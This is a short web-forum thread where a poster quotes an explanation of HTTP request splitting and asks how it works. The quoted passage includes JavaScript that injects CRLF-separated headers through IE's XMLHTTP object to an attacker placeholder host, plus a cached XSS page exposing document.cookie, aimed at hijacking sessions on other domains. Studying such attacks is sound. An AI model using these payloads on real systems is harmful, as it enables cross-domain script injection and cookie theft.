SitePoint Sponsor

User Tag List

Results 1 to 3 of 3
  1. #1
    PEACE WILL WIN abalfazl's Avatar
    Join Date
    Feb 2005
    Location
    Beyond the seas there is a town
    Posts
    711
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    HTTP Request splitting

    Hello


    A Request Splitting attack abuses flaws in
    asyncronous requests and allows to inject arbitrary
    headers when an Http request is built. The attack in
    the following examples is accomplished using IE's
    ActiveX object 'Microsoft.XMLHTTP', but there are
    unfixed objects in other browsers that permit it too.
    Let's make an example:
    var x = new ActiveXObject("Microsoft.XMLHTTP");
    x.open("GET\thttp://www.evil.site/2.html\tHTTP/1.1\r\nHost:\t
    www.evil.site\r\nProxy-Connection:\tKeep-
    Alive\r\n\r\nGET","/3.html",false);
    x.send();
    A javascript request forged as in the previous code
    will send the following requests:
    GET http://www.evil.site/2.html HTTP/1.1
    Host: www.evil.site
    Proxy-Connection:Keep-Alive
    GET /3.html HTTP/1.1
    Host: www.evil.site
    Proxy-Connection:Keep-Alive






    If there is a web proxy in the middle of the
    communication, it will see two requests asking for
    two pages at http://www.evil.com. As it explained in
    figure 3, the proxy will send the two requests and
    will get two response:
    Response 1: http://www.evil.site/2.html:
    <html> <body> foo </body> </html>
    Response 1_2: http://www.evil.site/3.html:
    <html> <head> <meta http-equiv="Expires"
    content="Wed, 01 Jan 2020 00:00:00 GMT">
    <meta http-equiv="Cache-Control" content="public">
    <meta http-equiv="Last-Modified" content="Fri, 01 Jan 2010
    00:00:00 GMT">
    </head> <body>
    <script>
    alert("DEFACEMENT and XSS: your cookie
    is"+document.cookie)
    </script>
    </body>
    </html>
    from browser's point of view, only request 1 has been
    sent, so Response 1_2 is simply put into browser
    queue waiting to be associated to the next request.



    Next step is to open a new window via Javascript
    with any host address (e.g. http://www.bank.com)
    and the browser will queue Response 1_2 instead of
    the original page.
    Auto Injecting Cross Domain Scripting
    It will be presented a new attack technique which
    takes advantage of HTTP request-splitting or request
    smuggling vulnerabilities and frame injection vectors.
    As a result of this attack a malicious user could
    inject a particular snippet of javascript code into any
    page of any domain to take control over user's
    browsing sessions.


    I don't get howe this attack work,May someone explain that?Response 1_2 is simply put into browser
    queue waiting to be associated to the next request,But how a hacker uses that?
    I shall build a boat,I shall cast it in the water,
    I shall sail away from this strange earth,
    Where no one awaken the heroes in the wood of love

  2. #2
    Unobtrusively zen silver trophybronze trophy
    paul_wilkins's Avatar
    Join Date
    Jan 2007
    Location
    Christchurch, New Zealand
    Posts
    14,696
    Mentioned
    101 Post(s)
    Tagged
    4 Thread(s)
    The attack works by forcing two pages to come through instead of just the one.

    When a new window is opened, you will see not what is supposed to be there, but instead the second page from the bad site.

  3. #3
    . shoooo... silver trophy logic_earth's Avatar
    Join Date
    Oct 2005
    Location
    CA
    Posts
    9,013
    Mentioned
    8 Post(s)
    Tagged
    0 Thread(s)
    Alright I don't mean to come off mean or rude, but you seriously need to stop and learn the basics. You are way over your head way over.
    Logic without the fatal effects.
    All code snippets are licensed under WTFPL.



Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •